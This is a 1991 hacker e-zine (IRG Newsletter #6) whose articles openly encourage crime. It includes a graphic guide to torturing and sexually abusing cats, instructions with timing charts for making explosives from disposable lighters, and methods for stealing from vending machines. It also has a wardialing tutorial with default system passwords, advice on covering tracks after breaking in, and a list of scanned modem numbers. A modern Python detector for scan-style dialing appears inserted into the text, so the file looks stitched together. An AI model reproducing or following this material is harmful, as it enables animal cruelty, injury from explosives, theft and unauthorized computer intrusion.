                 //////     ///////     ////////
                  //       //    //    //
                 //       ///////     //   ////
                //       //    //    //     //
             //////     //     //   /////////
             
     
     
    International Rogues Guild and Shadow/Net Presents...            
    IRG Newsletter v6.00              Released: 2/20/91 
    Written by: Haywire               Edited by: Haywire
        
        Hi everyone,
                Here's IRG number 6 for ya. More people are getting interested
and I am happy about it.  There's a lot of good stuff this time (like always,
hehe) so read up.  



 5.01 Table Of Contents
 ----------------------
 5.01...................................Table Of Contents              
 5.02...................................Disclaimer
 5.03...................................More About IRG
 5.04...................................CyberPunk Follies
 5.04b..................................State Of The Union Reply by Psycho
 5.05...................................Letters From Prison
 5.06...................................Planned Parent Hood For Cats by Damaged
 5.07...................................Disposible Lighter Bombs by Psycho
 5.08...................................Vending Machine Revenge by Psycho
 5.09...................................The Art of Scanning by Control-S
 5.10...................................Hacking CompuServe by Control-S
 5.11...................................Dos Trips by Wasteland Warrior
 5.12...................................Running The ShadowNet
 5.13...................................VMB's From Hell
 5.14...................................Hellos and Goodbyes 
                             
5.02 Disclaimer
---------------
        All items in this newsletter are meant for informational purposes. 
It is written to encourage illegal activities, I hope the reader is inspired
to break the law after reading all IRG Information.  Of course the authors of 
this newsletter cannot be held for anything that the reader does.
        WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO
NOT mess around with any of the recipes for explosives, EVER!  These recipes
are real, they can kill you, and anyone else.  Make sure you know what you're
doing.  Otherwise its your fault.

5.03 More About IRG
-------------------
        We have one new ShadowNet member this issue and a new journalist.
Hopefully you people are getting the idea and starting to write things for ANY
group, just sharing the wealth of info out there.  Until next time...


            IRG Members              Rank
            -----------             ------
            Haywire                 IRG and ShadowNet Leader
            Wasteland Warrior       Part Time Programer,Game Winner,IRG Member
            Psycho                  (615)ShadowNet Member
            Dr. Digital             (619)ShadowNet Member
            Damaged                 IRG's "Sick" Member
                
            Journalist
            ----------               
            Haywire
            The Spectral Demon
            Control-S
            Kryptic Night
            Psycho
            Damaged
            Wasteland Warrior
                
        That's about it.  If you feel like becoming a member of either IRG or
ShadowNet, please call one of the IRG nodes.  If you would like to become an
IRG node, again contact one of the IRG nodes.


5.04 CyberPunk Follies
----------------------
        I have only gotten one reply to my "State Of The Union" speech. It
seems that either people don't care what I say or they are too lazy to call up
my board and give me a response.  It seems that the Hacking community has
turned to shit more than I had thought.  But maybe people will get the idea one
day and move on to a higher level.


5.04b State Of The Union Reply by Psycho
----------------------------------------
In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would
like to make the following comments:

I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of 
hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a
means by which we SHARE information and spread the wealth of knowledge? We 
hackers have before us an incredible realm of POWER- This has been exhibited 
time and time again; Every time you hear of some kid who hacked into NASA or 
someplace and got caught, there are probably dozens more getting away with 
something just as spectacular.

In short, we have the ability to manipulate and control the flow of ALL manner 
of electronic information. The authorities are starting to realize the actual 
scale to which systems can be hacked into, but it is far too late to do 
anything about it. For every hacker that gets busted, five more take his place-
and it's a never-ending cycle.

United and working together as one, hackers have the propensity to virtually 
control (or shut-down) many facets of our society on a GLOBAL scale: banking, 
satellite communications, military, law enforcement, etc., etc.... But instead
of working together, the hacker community is splintered into many factions, all
more or less working against each other. Instead of liberating information for 
all, we are instead battling it out in our own little area codes, searching for
short-lived fame.

I'm not saying that we should shut down all systems and hold the world's data 
for ransom; That would be futile. Instead, we need to help educate those with 
an interest in hacking but lack experience. Not that we should toss info out to
anyone- There are still (and always will be) certain types of people that "just 
don't get it"... A little information and a lot of stupidity can be a dangerous
thing with this type of "wanna-be". By a careful process of weeding out these 
types, the data will begin to flow into the hands of those that can best put it
to use.

So, in 1991, let's try to unify and SHARE our expertise- And I think you'll 
find that the hacking/phreaking community will benefit from this like never 
before. Hats off to Haywire and everyone else involved with the IRG for 
publishing this fine newsletter and making an effort for change.

                                                             -Psycho

5.05 Letters From Prison
------------------------
        I have been getting a lot of stuff this issue and I am very happy about
it.  The more the better, it always seems like I never have enough stuff.  This
issue is pretty long, getting into a lot of good stuff.  This is a great issue,
check it out...


5.06 Planned ParentHood For Phelines by Damaged
-----------------------------------------------


                          Phile #1 of a series Unknown


                          @-@-@-@-@-@-@-@-@-@-@-@-@-@-
                          -                          @
                          @  Planned ParentHood for  -
                          -                          @
                          @         Phelines         -
                          -                          @
                          @-@-@-@-@-@-@-@-@-@-@-@-@-@-

                                   WRiTTEN BY:

                                     Damaged
                                     2.14.91


  iNTRO 

   Ok dudes this is my phirst seriers of Anrkey philes on Kat's.  Don't you
  just hate those little pussy's, i sure in the hell do.  Anyways,  the phile
  is all How to do it yourself Home Kat abortions.  Why the reason for kats,
  well i hate the goddamn shitheads for specific reasons.  That i won't get
  into.  Well enjoy the phile and have phun.


  SHiT YA'LL NEED 

  Propane torch
  Koat Hanger
  Gloves    <should be able to resist heat>
  Rope                <optional>
  Nails               <optional>
  Hammer              <optional>
  Drugs
  & a Kat of kourse


  GET'N STARTED 

   Ok, now get the above required stuff.  Now toke a little, phry or whatever
  get's ya going.  Phirst off take the koat hanger and bend it into a phairly
  straight wire.  Take the koat hanger and make a noose on one end.  You need
  to make sure that the noose is small enuf to phit into da Kat's Kunt.

  PHUN PART 

   Ok now go out and phind yer victim.  Well you have phound a kat, put on
  the gloves so you don't get scratch to hell and back.  Now this is where
  the optional shit komes in.  You kan either Nail the phucker to the ground
  by hammer'n nails thourgh it's pheet.  This technique i phind to be the most
  effective.  Or if your one of those squemish types (why the phuck are you
  read'n this then??) you kan use the rope.  Just spread the phucker's legs
  to the phour korners.  Tie the rope around each paw and tie to something
  else.  Now you have the kat down supplied and bagged.  Reach over and grab
  your nice instrument(koat hanger) and also grab the torch.  Now you should
  be still wear'n the gloves, if not jack'n off will be a little harder phor
  you to do now.  Anywayz, heat up the end of the noose with the oval end or
  however the phuck you made it.  Wait until the shit is shine'n real bright
  orange or yellow.  Some koat hangers will even turn white, now make sure
  you don't melt the damn noose. duh  Insert the heated end of the noose into
  the kat's kunt, now jam the phucker all around, make sure you get every last
  one of those bastard kittens outta there.  After you have phinished, unnail
  or untie the kat.  Now i doubt it will walk away, but if you know who owns
  that kat, be a phriendly neighbor and drop it off at their house phor them.
  Now you really don't know which Kat is or not pregneat so hell try evey one
  of those pussy's.  Now this also works for dogs, and even try this on yer
  girlphriend if you even knock her up.


  OTHER SiCK SHiT 

   Now some other phun shit to do while do'n this.  Bring along a tape recorder
  or a kamcorder and record the shit.  Go home listen or watch it over and
  over again.  Loads of phun dude.  Now for you sick perverts,  take a knife
  and just make the kat's kunt big enuf to slide yer dick in, hell a phree
  phuck.  You kould also bang the phucker up the ass to if ya wanted.  The
  best part about this is that it's like bust'n a virgin everytime and you
  don't have to wear a kondom either!  Oh yea while ya do this phry really
  hard too.

  Yo'S & PHUCK oFF'S 

  Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice
  back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve
  some yo's (yea right)

  Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD
  lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those
  K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too.


  KALL THESE KiCK'N SiSTEMS 

    Insanity Lane..........619.591.4974     -=> IRG HQ <=-
    Zanaphopia.............404.642.8703     -=> AoA HQ <=-
    The Corrupt Society....619.630.8450     -=> NHA HQ <=-
    Demon's Crypt..........516.791.1427     -=> SoC HQ <=-
    Phreak Accident........404.977.4272


  Latur dudes
      Damaged


[--------------------------------- EOF ----------------------------------]


5.07 Disposable Lighter Bombs
-----------------------------

                                **************
                                *            *
                                * Disposable *
                                *   Lighter  *
                                *    Bombs   *
                                *            *
                                **************

                                   by PSYCHO

                        Written EXCLUSIVELY for The IRG



For those of you who are budding anarchists or Mad Bombers, but don't feel
comfortable cooking up nitroglycerine in your mom's kitchen or making pipe
bombs in the garage, here's a fairly decent alternative that is safe, easily
transported, cheap, and effective if used properly.

All you need is a good supply of those shitty disposable lighters, like a Bic
for instance. These can be bought cheaply (or stolen, if you're so inclined) at
every damn convenience store between here and East Camelfuck, Iraq. Prices 
range from about 39 cents for averaged-sized lighters, up to about $1.79 for 
the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE
disposable, holding about 65% more butane than the large Bic! They're available
at fine truck stops everywhere...). Here is a chart to help you decide which
lighter is best for your explosive needs:

        Lighter                   | Size of Explosion *
       ---------------------------|----------------------------------
        Mini Bic                  | Small; 4 to 6 inch fireball
                                  |
        Scripto                   | Medium; 6 to 12 inch fireball
                                  |
        Regular Bic               | Large; 12 to 18 inch fireball
                                  |
        Cli-Cla                   | HUGE; 24 to 30 inch fireball
       --------------------------------------------------------------
*(NOTE: These sizes are only an APPROXIMATION based on past observances-
        fireball size and intensity may be affected by such factors as 
atmospheric pressure, wind speed, humidity, manufacturing defects, etc. 
Your results will vary.)

As you can see by the above chart, some of these lighters can be quite 
powerful. To give you a better frame of reference, consider the Mini Bic to be 
as powerful as an average firecracker, the regular Bic as powerful as an M-80 
firecracker ( a REAL M-80... You can only get them illegally in this country- 
they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to 
1/2 stick of dynamite, under perfect conditions.


                     PREPARATION AND METHODS OF DETONATION

To prepare a lighter for use as an explosive device, the only real modification 
that must be made is the removal of the flame guard. The flame guard is the 
semi-elliptical piece of metal that is found on top of the lighter which 
encases the gas jet and flame adjustment mechanism (if present). This is easily 
removed by using a screwdriver (or even a finger) to pry away one edge of the 
flame guard, and thus popping the whole thing loose.

With the above out of the way, you are ready for the placing of the device. 
Keep in mind that since the laws of physics declare that a force will always 
follow the path of least resistance, some forethought should go into the 
placement of the device for best results. If you just want a purely-for-the-
hell-of-it explosion, the lighter can be placed on open ground, but for a 
specific purpose, such as the destruction of an object, opening of a door, 
etc., the lighter will need to be wedged as tightly as possible against the 
target.

The only "timing device" you will have, such as it is, is the actual flow of 
gas from the lighter. Some lighters have no flame adjustment mechanism, and 
thus you have very little control over when the explosion will take place. On 
lighters where the control is present, you will be able to approximate the 
point at which detonation will occur. This is accomplished by turning the 
adjustment wheel toward the <+> or <->, with the <+> side naturally exploding 
faster. In some lighters, the maximum <+> setting can be over-ridden to allow 
the butane to escape very quickly, but keep in mind that the faster the gas 
escapes, the lower the power of the resulting explosion. You may find some 
experimentation necessary with different types of lighters you plan to use      
before you can become familiar with the approximate detonation times.

Once you have decided on a target and length of time needed to escape and/or 
take cover, you are now ready to ignite the lighter. The most important element 
to keep in mind it that the gas release lever MUST remain depressed for the 
duration of time until the explosion occurs. There are many methods for 
assuring this, as pointed out below:

    A. Wedge the lever in the open position by placing an object between it and  

   the striking wheel.

B. Glue the lever down with a glob of Crazy Glue.

C. Tape the lever down with aluminum strapping tape (regular tape will not   
   work due to rapid melting).

D. Wire the lever down with a few inches of light-gauge copper wire.

These methods are not the only absolute choices you have, but I have always had 
good luck with them.

Once the lever has been secured, you need to act as quickly as possible, to 
ensure as little butane as possible is wasted. Using another lighter, ignite 
the stream of gas escaping from the one you want to explode. Another factor you 
might want to consider for timing is the physical direction of the tank of the 
lighter in relation to the flame- If the flame is above the tank (as in normal 
operation), it will take much longer for the heat to melt the plastic and cause 
the detonation than it would if the tank was placed at a 45-or-so degree angle 
with the flame being BELOW the tank. Here is a chart of approximate times based 
on positioning of lighter and gas flow:


               Gas    |   Lighter Upright   |  Lighter Inclined
               Flow   |  (flame above tank) | (flame below tank)
              ==================================================
               MIN.   |     5-10 minutes    |     3-5 minutes
              --------|---------------------|-------------------
               MED.   |     3-5  minutes    |     1-3 minutes
              --------|---------------------|-------------------
               MAX.   |     1-3 minutes     | 60 seconds or LESS

Again, these figures are APPROXIMATE- Times will vary according to many factors 
including, material used in manufacture, quality of butane, etc.

Using the above chart as a guide, plus some experimentation on your own, you 
should be able to discern timing factors relating to your individual needs in 
certain situations. Of course, lighting the butane and allowing it to melt the 
plastic tank casing is not the only method for detonating disposable lighters-
other possibilities include:

    * Affixing a large firecracker or other small explosive device to the tank

* Placing the lighter in an open flame (campfire, fireplace, etc.)

* Placing the lighter on, in, or near a heat source (engine block, tail 
pipe, oven, space heater, etc)

As you can see, however and wherever you choose to use a lighter as an 
explosive, it is a cheap and (usually) ample solution. Always use great care 
and common sense when handling ANY explosive device, and have your escape route 
or cover picked out well in advance. Also be aware that, due to the materials 
used in it's construction, an exploding lighter will hurl bits of metal and 
molten/flaming plastic, sometimes for several yards in all directions.

                                HAPPY BOMBING!

Thanks to: Haywire & The MIGHTY IRG!

Special Thanks to: The Phantom Fireman for his pyromania expertise.


5.08 Vending Machine Revenge
----------------------------


                            VENDING MACHINE REVENGE


                                   by Psycho

                              Written for the IRG



How many of you have ever been ripped off by a vending machine? I would guess 
that EVERYBODY, at one time or another (and probably MANY times), has met up 
with a "change eater". This can be frustrating as hell, especially if you're 
hungry or thirsty and the machine took all the change you had. Worst of all, 
many times the owner of the machine takes his sweet time getting it fixed- 
After all, any money you lose is pure profit for him. The following is a 
collection of various techniques that have been used with great success to 
extract revenge on these money-grubbing bastards, and can put a few bucks in 
your pocket as well. I guess some unscrupulous person COULD use this 
information just to rip off other hapless consumers, but that is their 
discretion (ha ha!).

1.0 SLUGGING
    This is one of the most common forms of Vending Machine Revenge (from 
herein referred to as VMR), and also one of the safest. Basically this 
involves putting something into the machine that is not a coin, but the 
machine will think it is. Experimentation of a high degree will be in order 
here, as all machines have different levels of sensitivity. Some of the 
more common items used include: metal washers, arcade tokens, foreign 
coins, plastic discs, etc. I think you get the idea. I have even heard of 
people using a bench grinder to file pennies down to dime size, but that 
seems like an awful lot of work for 9 cents, but how you want to spend your 
time is up to you. Again, you'll have to experiment a lot with this one. If 
anyone finds some that work particularly well, leave me a message on the  
IRG/Insanity Lane node, and I'll draw up a chart for a future issue.


2.0 TIPPING
Another quite popular method, this is accomplished by physically tipping 
the machine forward as far as you can get it, hence the name. This works 
best on those machines that have potato chips and stuff dangling from long 
metal rods, and also those that use spiral rods to hold the stuff. If you 
want to use this method of VMR to the fullest, it's best to take along a 
couple of stout friends. Reason being, you will get the best results by 
practically putting the front of the machine down to the floor, and some of 
these bastards can be REAL heavy. So, DON'T try this one alone (unless you 
look like Arnold Schwarzeneggar), and make sure you do it quietly and in an 
out of the way area to avoid getting caught.

3.0 ROCKING
The Rocking method for VMR is similar to the above, but is seems to work 
best on coke machines which dispense cans. To get free cokes, you rock the 
machine back and forth, really banging the hell out of it. This confuses 
the machine's coin mechanisms, and it will usually start spitting out 
cokes. This VMR method will also require the assistance of friends, for 
obvious reasons (coke machines are the heaviest of all vending machines). 
This one must also be executed in a very deserted place, due to the 
excessive noise level created. You'll also want to remember to take along 
some backpacks, pillowcases, etc., to put your free cokes in. I have seen 
machines completely emptied using this method.

4.0 PLUGGING
So far, we've only discussed methods with which you can obtain free snacks- 
Now, here's one that can net you some good pocket change. Unfortunately, 
this will only work as described on newer coke machines. Perhaps with 
experimentation, it can be adapted for use on other machines. Plugging is 
accomplished by doing just that- you use something which will get hung in 
the coin slot, such as a penny, slug, etc., but will still fall through 
when the coin return is pressed. On newer coke machines, the coin return is 
a long piece of horizontal metal that presses straight down. After 
inserting your plug, use a flat-blade screwdriver to bend the coin return 
bar so that it cannot be depressed. Now, take the rest of the day off and 
do whatever. When you return later that night, use your screwdriver to bend 
the return lever in the other direction. When you press it down- JACKPOT! 
You get all the coins that other people have "lost" that day. Rotate among 
different machines, and don't plug the same one more than once a week to 
obtain best results. By doing this to enough machines in various locations, 
it's possible to make around $100 PER DAY (the average take for one machine 
is usually around $5). Another good place to do this occasionally is coke 
machines in expensive hotels, since they usually inflate the price of their 
drinks by 50% over normal machines. Be extremely careful and don't get TOO 
greedy, and this method is very safe.

5.0 JAMMING-1
This type of VMR is one of the best for getting lots of free stuff. What 
you do is actually jam the "product chute" (where the goods come out). Any 
manner of things can be used to do this. For instance, open the little door 
on a coke machine where the cans come out. Now, take a stick, huge wad of 
paper, etc., and cram it as far up into the machine as you can comfortably 
reach. This will block the arrival of anyone's purchase, and you only have 
to pull out whatever you blocked it with on your return to retrieve the 
stuff. On cigarette machines, you can even put tape over the side slot 
where the smokes are dispensed to accomplish this. As in some of the above 
methods, experimentation will be in order here to learn about the machines 
in your area. This is a fairly safe method of VMR.

6.0 JAMMING-2
This is the same as the above method, but instead you jam the change return 
slot. It's not as profitable as screwing up the coin return, but hey- it's 
FREE money. You may have to use a small wire to accomplish this on machines 
that have a small door that opens inward on the change slot. Again, if done 
smartly and not too often to the same machine, this VMR method is safe.

7.0 ZAPPING
Personally, I have never been able to get this one to work, but I know 
people that swear by it and say they use it all the time. Also known as 
"shorting", this type of VMR involves locating the socket where the machine 
is plugged in, and rapidly working the plug back and forth, causing the 
electronics in the machine to screw up. I'm told it only works on machines 
that have an LED display showing the amount you've dropped in. One person 
claims to have "maxed-out" the display at $9.99 and got that much OUT of 
the machine when he hit the coin return! Like I said, I've never been able 
to do this, but there are lots of people who claim it can be done. 
Experiment and find out for yourself, and drop me a line if you get it to 
work.

8.0 KILLING
This isn't as drastic as it sounds- It actually means that you unplug the 
machine, thus "killing" the power to it. Some machines, when unplugged, 
will simply NOT return any coins. And, you'd be surprised at how many 
people will go ahead and stick money in a machine, even if it's not lit 
up... And most people won't look for the plug to check it, either. This is 
a very safe, quiet method that has been proven to work on certain machine. 
As before, experiment with machines in your local area.

Well, that should be enough ideas to get you started- I'm sure there are many, 
many more. If you have a particular favorite, leave me e-mail on Insanity Lane 
and I'll include them in any future updates of this article. In the meantime, 
just remember not to get too greedy, and you can have a tidy little income from 
your VMR exploits.

Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me
              to write this article.

Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for    
                   their input in compiling this article.


5.09 The Art Of Scanning by Control-S
-------------------------------------


                     +++++++++++++++++++++++++++++++
                     ++                           ++
                     ++        The Art Of         ++
                     ++    *->> Scanning <<-*     ++
                     ++                           ++
                     ++       By: Control-S       ++
                     ++                           ++
                     +++++++++++++++++++++++++++++++


This file is written for International Rogues Guild (IRG), and is
the second in a series of files aimed towards the beginning hacker.
If you've been around a while, you will most likely find nothing
of use here.


Part 1: Scanning, the art of
Part 2: Scan-Pages v1.00


Disclaimer: This phile is for informational purposes only, and I
cannot be held responsible for the actions of anyone reading it.

WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of
your every day vocabulary, stop reading now, you are too far gone for help. 


Scanning:

Scanning is one of the most legal aspects of hacking, and a lot of fun too.
I'm not saying that scanning IS legal, I really doubt you could get anyone
to answer that question. If the SS wants to bust you, they will do it for
scanning, or anything else they feel like. If there's no law against it,
they will make one up! You can't win, so I would just recommend that you
watch your step no matter what you do.

You can scan many different places, like x25 networks such as TymNet and
Tele(Sprint)Net or simply telephone exchanges, which is what I'll be 
going into here: Scanning your local exchanges. I basically view this as
'getting to know your neighborhood' - it's good to get an idea of how 
many modems are in yer area, and just what sort of 'puters are connected
to them. You'll more than likely come across a few Unixes, and some VMS'.
If you're lucky, you'll find a LAN or WAN, and be able to reach a bunch
of different systems from one number. Some of these even connect to far
systems, some with outdials (which you can scan other areas through), or
gateways (where you can hook into even more systems and/or psn's). 



Things You Need:

*Personal Computer -  (almost any type) (Amiga recommended)
*Modem - (any baud) (at least 2400 recommended)
*A Wardialer or Scanning program - These are available for just about
 every type of computer, but if you can't find one, they are easy to
 write yourself, in either basic or even scripting. (I would highly
 recommend you write your own, it's a good way to get started programming
 and you can customize it to do exactly what you want it to.)
*References - You should have on hand (or committed to memory) some
 text files or manuals that will help you identify the systems you find,
 and then give you an idea of how to get in and possibly use them.
 (You can find detailed 'how to' files on just about any operating
 system you might find in many Phrack newsletters, if you don't have
 them all, get them!) - (See appendix A of this file for simple system
 identification).
*A little common sense - sorry, you're on your own with this one.


Getting Started:


Using that little bit of common sense, you should fire up your computer
and modem. (If you can't get by this part, you should stop reading this
file immediately, run down to your nearest computer store, and trade
your PC in for a nintendo!)

For best results, you will want to do some sort of sequential scan, this
way you won't miss any carriers. If you are paranoid about leaving a
sequential pattern, (the SS looks for this sometimes, trying to catch
'c0dez kidz') then you will have to make some part of the dialing random.
Making the whole scan random has a few problems; if you want to make sure
you get all of the numbers, and don't keep going over the same ones, you
have to keep track of all the numbers dialed and check it every time
before dialing. This is a big waste of time. The best way to do a sequential
scan without a pattern is to use a node dialer. Node dialers are common
in code hacking programs, and these are easily modified to just scan.
The ideal configuration for a node dialer (the one I use) would be to
use 10 nodes, each scanning 1000 numbers in the same exchange, then just
randomize which node is dialed.
Example:

Node 1 Dials 0000->0999
Node 2 Dials 1000->1999
Node 3 Dials 2000->2999
Node 4 Dials 3000->3999
Node 5 Dials 4000->4999
Node 6 Dials 5000->5999
Node 7 Dials 6000->6999
Node 8 Dials 7000->7999
Node 9 Dials 8000->8999
Node10 Dials 9000->9999

ATDT <prefix>+<random node>

This method is just as fast as dialing them straight out, you don't
miss any numbers, re-dial any numbers, and you aren't using any
detectable dialing pattern (other than possibly 300 calls per hour).
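
A defender's view of the parenthetical above, as an added example that is not part of the original newsletter: interleaving the ten 1000-number blocks defeats a check for consecutive numbers, but the call volume and spread across one exchange still stand out in call detail records. The record layout, the caller names and the 60-lines-per-hour threshold are assumptions, and the sample records are constructed.

```python
"""Added example: flag scan-style dialing in call detail records (CDRs)."""
import random
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)
MAX_DISTINCT = 60  # assumed threshold: distinct lines in one exchange per hour


def longest_sequential_run(lines):
    """Naive check: longest run of back-to-back calls to N, N+1, N+2, ..."""
    best = run = 1 if lines else 0
    for prev, cur in zip(lines, lines[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def detect_scanners(cdrs, window=WINDOW, max_distinct=MAX_DISTINCT):
    """Return {caller: (exchange, peak distinct lines)} for callers over threshold.

    cdrs: iterable of (timestamp, caller, exchange, line), sorted by timestamp.
    Dialing order is ignored; only coverage of one exchange per window counts.
    """
    recent = defaultdict(deque)  # (caller, exchange) -> deque of (ts, line)
    flagged = {}
    for ts, caller, exchange, line in cdrs:
        q = recent[(caller, exchange)]
        q.append((ts, line))
        while q and ts - q[0][0] > window:  # drop calls older than the window
            q.popleft()
        distinct = len({dialed for _, dialed in q})
        if distinct > max_distinct and distinct > flagged.get(caller, ("", 0))[1]:
            flagged[caller] = (exchange, distinct)
    return flagged


def lines_for(cdrs, caller):
    """Lines dialed by one caller, in call order."""
    return [line for _, c, _, line in cdrs if c == caller]


def build_sample_cdrs(seed=1991):
    """Constructed records (not real traffic) for two hypothetical callers."""
    rng = random.Random(seed)
    start = datetime(1991, 2, 20, 9, 0, 0)
    cdrs = []
    # caller-A: 300 calls in under an hour to exchange 555, with the order
    # interleaved across ten 1000-line blocks as in the pattern described above.
    next_in_block = [block * 1000 for block in range(10)]
    for i in range(300):
        block = rng.randrange(10)
        ts = start + timedelta(seconds=12 * i)
        cdrs.append((ts, "caller-A", "555", next_in_block[block]))
        next_in_block[block] += 1
    # caller-B: an office line redialing a handful of known contacts.
    contacts = [("555", 1212), ("555", 4400), ("555", 8731), ("867", 5309)]
    for i in range(40):
        exchange, line = rng.choice(contacts)
        cdrs.append((start + timedelta(seconds=90 * i), "caller-B", exchange, line))
    cdrs.sort(key=lambda record: record[0])
    return cdrs


if __name__ == "__main__":
    sample = build_sample_cdrs()
    run = longest_sequential_run(lines_for(sample, "caller-A"))
    print("longest consecutive-number run for caller-A:", run)
    for caller, (exchange, peak) in detect_scanners(sample).items():
        print(f"{caller}: {peak} distinct lines in exchange {exchange} within 1h")
```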


Now that you've got your dialer configured, you need to find a good time
to scan. Again, if you're paranoid, you should stick to scanning
between 9AM and 5PM. This is for two reasons: 1) This is when most
business calls are made, and in the huge volume, you will be that much
harder to detect. 2) If you DO get busted (can you imagine going to court
for such a thing? hah!) you will have a good case, as many people dial
sequential numbers during this time, (re: telemarketers, surveys...).
This is also probably the time when you'll be at work/school/whatever,
so you won't be needing your CPU. (I personally scan while I'm asleep,
at night - I'm not that paranoid!) As a rule of thumb, don't watch the
dialer. For some reason, no carriers are detected while you watch the
scan in process. (I've heard rumors that this is the result of a minor
disturbance in the local space-time-continuum caused by invisible 
emissions from the iris, but have seen no proof to back this theory.)

Okay, now you have your dialer ready and a good time to scan. Fire it
up and check on the progress every few hours. After you scan out a fair
sized list of carrier signals, you should give the dialer a rest, boot
your favorite term program, and investigate all your finds. Don't expect
to see something like this: "Welcome SysOp!" on the systems you check, 
in fact, expect nothing. Many systems don't wave any banners or tell
you anything; you have to try and coax a response out of them. Things
to try would be: <Carriage Return>'s, Ctrl-C, or any other Ctrl-'s
(if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many
systems use this as a 'halt-output' switch, and you may discover the
right keys to press, but never know it because all output is stopped).
Try sending "..." or @'s, [Esc], and sending a hard break almost always
gets some response; if none of the above work, try any character on
the keyboard, and words like "boot, start, run, load, logon, login".
If you have an external modem, keep an eye on the "Receive Data" light;
if it flickers and you aren't getting anything echoed to your screen,
or possibly a lot of garbage characters, switch to 7E1, or call back
at a lower baud rate. (I've found a bunch of systems with modems that
will connect you at 2400, but the com ports will only transfer data
at 1200 or 300.) If you try everything and can't get any response at all,
it could be a company which turns its computers off at night, but
leaves the modem on (so call back in the day), a crashed system, or
a hacker who got your scan-call at 3am and whistled an unerring 8N1
into his receiver at a steady speed of 2400 bits per second. -heh

When (if) you identify the operating system, break out your references,
and try all the default accounts. If you get in on a default, but
you're unfamiliar with the particular OS, don't mess around, just log
off and do a little research, learn how to turn off all the logging and
cover your tracks, then go back and have phun to your heart's content.

Remember: keep notes on all the systems you find. You never know when
some ancient OS might come in handy, or what you might find that
relates to any system while trashing at a later date!



Appendix A:

The following is a short chart to help you identify operating systems.

System     Prompt                Default Accounts/Passwords
---------  --------------------  -------------------------------------
Unix       login: -or- Login:    root,daemon,bin,sync,uucp/(unpassworded)

VAX        Username:             SYSTEM/MANAGER -or- FIELD/SERVICE

DEC-10     User ID:              1,2/ ?

HP-?000    PLEASE LOG IN:        HELLO,MANAGER,

Iris       ACCOUNT ID?           MANAGER

VM/CMS     IBM VM/370 ONLINE     logon (user id)

NOS        FAMILY:

Primos     "PRIMENET XX.X.XXX"   login SYSTEM/SYSTEM -or- OPERATOR



* This is hardly all-inclusive, only the ones I know from memory; you should
  try and compile your own list, and add new systems to it regularly.



   This has been a phree Speech publication, (C) pSp and IRG 1991


As usual, I can be contacted for whatever on any of the IRG nodes, or
IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S".


              Control-S, Freelance G-File Artist (for hire)






Scan-Pages v.99b:

Note: Unfortunately, I will be unable to finish my current scan in time
for the next IRG release, so I stuck this partial scan in to fill the 
spot. Look for a complete scan in v1.00, next IRG.


NPA/NUM-BER    Baud   System/Comments
------------   -----  --------------------------------
619/259-0038   n/a    ?/constant tone
619/270-0017   1200   ?/has echo on
619/270-0038   2400   ?/"Unauthorized User, Call Recorded and Disconnected"
619/753-0006   n/a    ?/constant tone (may be loop)
619/753-0013   n/a    ?/constant tone
619/753-0171   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0172   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0173   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0174   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0175   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0176   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0243   2400   ?/(sending a hard break makes hangup)  
619/753-0287   1200   TRW Dialup
619/753-0288   1200   TRW Dialup
619/753-0548   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0716   1200   ?/"ALPHA BASE, PLEASE LOG IN:"
619/753-0738   1200   ?/(just hangs up, maybe callback security?)
619/753-0911   1200   ?/(response to break ^Z)
619/753-0916   1200   ?/(response to break ^Z)
619/753-0933   1200   ?/(response to break ^Z)
619/753-0962   1200   ?/(response to break ^Z)
619/753-0981   2400   HP-?0000/PLEASE LOG IN: (try 'help')
619/753-1550   2400   PC-Plus Host Mode/ American Bamboo Society
619/753-2614   1200   ?/(absolutely no activity - a modem with no 'puter?)
619/753-2728   2400   "Host Name:" (^C will get "User ID:") (CIS, node ENC)
619/753-1654   2400   ?/Esc will get "ACCOUNT-ID: / PASSWORD:"
619/753-1079   1200   ?/"D29, System C, Node XX, Line XX"




        This is hardly a complete list, it's more or less the result
of boredom, and fairly random scanning through an outdial. It does
cover about 1/3 of the 619-753 exchange, but I never finished because
of lack of time and other projects taking precedence. I would like
to try and organize a concerted effort to map out any/all NPA's, and
eventually publish a masterlist of all detectable carrier signals. It's
easy to do, and you can usually let yer computer scan while yer gone
to school/work, so if you'd be interested in helping out, leave me a
note on one of the IRG boards and tell me the NPA and exchanges you'd
be able to scan, via local call or some sort of outdial, so we can make
sure that different people aren't wasting time scanning the same exchanges!
Anyone who helps to build the list will g1 at Glasgow



6.BBSs From Hell
----------------
        Here is this issue's installment of BBSs From Hell.

Board Name                      Phone Number      NUP       SysOp
-------------------------------------------------------------------------------
Shadow's Of Doom                313/274-5630      ?          ?
Fornax                          408/370-0722      ?          Briareos
The Rocky Mountains             714/530-6258      ?          ?
The CorrupT SocieTy             619/630-8450      Defiance   The Spectral Demon
Land Of Karrus                  215/948-2132      Nightmare  Scooter

Next issue we will have five more Elite BBSes for you to try.  Sorry if I have
placed your bbs number on here without your knowing, if you would like it
removed from the master list please E-mail me at Insanity Lane 619-591-4974
NUP: Last Try.


7.VMBs From Hell
----------------
        Here's a little plus I decided to have in each IRG news, a VMB list. It
